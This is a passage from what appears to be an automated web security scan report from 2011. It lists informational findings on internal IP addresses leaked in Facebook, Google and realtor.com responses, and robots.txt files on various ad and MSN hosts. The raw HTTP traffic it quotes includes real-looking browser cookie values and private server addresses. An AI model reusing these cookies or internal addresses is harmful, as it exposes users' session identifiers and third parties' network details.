GET /extern/login_status.php?api_key=148695881829460&app_id=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f1ad2b24%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2c460332%26relation%3Dparent.parent%26transport%3Dflash&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16b7d2314%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2c460332%26relation%3Dparent%26transport%3Dflash%26frame%3Dfc2061e24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3633d75e4%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2c460332%26relation%3Dparent%26transport%3Dflash%26frame%3Dfc2061e24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e10c7e8c%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2c460332%26relation%3Dparent%26transport%3Dflash%26frame%3Dfc2061e24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f7212f4c%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2c460332%26relation%3Dparent%26transport%3Dflash%26frame%3Dfc2061e24&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1e10c7e8c&origin=http%3A%2F%2Frealestate.msn.com%2Ff2c460332&relation=parent&transport=flash&frame=fc2061e24
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.19.41
X-Cnection: close
Date: Tue, 26 Apr 2011 18:39:23 GMT
Content-Length: 0


25.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/?scope=web&mkt=en-US&FORM=MSMONY
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.47
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:53 GMT
Content-Length: 8536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ec774a28%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent.parent%26transport%3Dflash&font=arial&href=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145%2526refId%3DLIKE&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.39.64
X-Cnection: close
Date: Tue, 26 Apr 2011 18:46:07 GMT
Content-Length: 10393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhome.php%3Fsrc%3Dfftb%23%21%2FAIDSWalkBoston&layout=standard&show_faces=true&width=450&action=like&font=trebuchet+ms&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.34
X-Cnection: close
Date: Tue, 26 Apr 2011 21:44:32 GMT
Content-Length: 8140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.30. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f73fc56%26origin%3Dhttp%253A%252F%252Fmoney.msn.com%252Ff273c1278c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fmoney.msn.com%2Ftax-tips%2Fpost.aspx%3Fpost%3D8fa91862-f906-481d-8eae-2c7e1758d57c%26scptb%3Df&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.253.46
X-Cnection: close
Date: Tue, 26 Apr 2011 18:46:14 GMT
Content-Length: 8420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.31. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=148695881829460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c4f8d2a4%26origin%3Dhttp%253A%252F%252Frealestate.msn.com%252Ff2850c939c%26relation%3Dparent.parent%26transport%3Dflash&font=arial&href=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145%2526refId%3DLIKE&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=360 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.18.57
X-Cnection: close
Date: Tue, 26 Apr 2011 18:46:08 GMT
Content-Length: 10569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.32. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=143021229053479&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f81e4fc%26origin%3Dhttp%253A%252F%252Ftheinvestedlife.msn.com%252Fffe09d674%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Invested-Life%2F149304748418908&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.245.38
X-Cnection: close
Date: Tue, 26 Apr 2011 18:39:43 GMT
Content-Length: 8220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

25.33. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT
If-Modified-Since: Tue, 26 Apr 2011 14:41:19 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Tue, 26 Apr 2011 18:41:56 GMT
Date: Tue, 26 Apr 2011 21:11:09 GMT
Expires: Tue, 26 Apr 2011 21:11:09 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

25.34. http://www.realtor.com/search/widgetportal/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /search/widgetportal/Widget.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 HTTP/1.1
Host: www.realtor.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=02cqtyvthyh3kbzxkedpaqwg; path=/; HttpOnly
Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Mon, 25-Apr-2011 18:46:19 GMT; path=/
Set-Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; domain=realtor.com; path=/
Set-Cookie: recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; domain=realtor.com; path=/
Set-Cookie: RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1; domain=realtor.com; expires=Thu, 26-Apr-2012 18:46:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 69807
Content-Length: 69807


<!DOCTYPE html>
<!--[if gte IE 8]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE IE8 IE6+ IE7+ IE8+ IE8-"><![endif]-->
<!--[if IE 7]><html xmlns="http://www.w3.org/19
...[SNIP]...
<div id="trackingvariables" style="display: none;">
false|http://10.166.132.161:8080/EventLogWS/EventLogWSController?|C</div>
...[SNIP]...

26. Robots.txt file  previous  next
There are 29 instances of this issue:


26.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.2. http://amch.questionmarket.com/adsc/d890935/20/892222/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d890935/20/892222/randm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=805
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

26.3. http://api.bing.com/qsonhs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Content-Length: 1879
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 21:36:26 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Akamai-TestID: b22c3bdd388240e3983f754dc40ac3ab
Cache-Control: public, max-age=15203400
Date: Tue, 26 Apr 2011 18:36:37 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

26.4. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 18:36:34 GMT
Date: Tue, 26 Apr 2011 18:36:34 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.5. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 18:36:16 GMT
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.6. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 20:11:05 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

26.7. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 26 Apr 2011 20:11:05 GMT
Expires: Tue, 26 Apr 2011 20:11:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.8. http://freemanco.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemanco.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: freemanco.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Last-Modified: Tue, 18 Jan 2011 23:41:38 GMT
ETag: "47-49a27710e3080"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-agent: IFT Search Robot
Disallow:

User-agent: *
Disallow: /

26.9. http://investing.money.msn.com/mv/MarketStatus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.msn.com
Path:   /mv/MarketStatus

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investing.money.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Apr 2011 23:05:34 GMT
Accept-Ranges: bytes
ETag: "033a72066f9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close
Content-Length: 435

User-Agent: *
Disallow: /*pgnew=
Disallow: /*_p=
Disallow: /*ucpg=
Disallow: /?from=
Disallow: /*&=&
Disallow: /*page=0
Disallow: /*page=&
Disallow: /*feat=
Disallow: /*pollcontent=
Disallow
...[SNIP]...

26.10. http://l.addthiscdn.com/live/t00/120lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/120lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 11:05:10 GMT
ETag: "d71005-1b-4a0b6aa63c580"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 26 Apr 2011 22:40:29 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


26.11. http://money.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: money.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Last-Modified: Sat, 04 Dec 2010 06:12:06 GMT
ETag: "ffbc52d7a93cb1:803"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:34 GMT
Connection: keep-alive
Content-Length: 417

User-Agent: *
Disallow: /*pgnew=
Disallow: /*_p=
Disallow: /*ucpg=
Disallow: /?from=
Disallow: /*&=&
Disallow: /*page=0
Disallow: /*page=&
Disallow: /*feat=
Disallow: /*pollcontent=
Disallow: /*votesh
...[SNIP]...

26.12. http://moneycentral.msn.com/inc/css/ww.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/css/ww.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: moneycentral.msn.com

Response

HTTP/1.1 200 OK
Content-Length: 63
Content-Type: text/plain
Last-Modified: Wed, 25 Feb 2009 07:27:06 GMT
Accept-Ranges: bytes
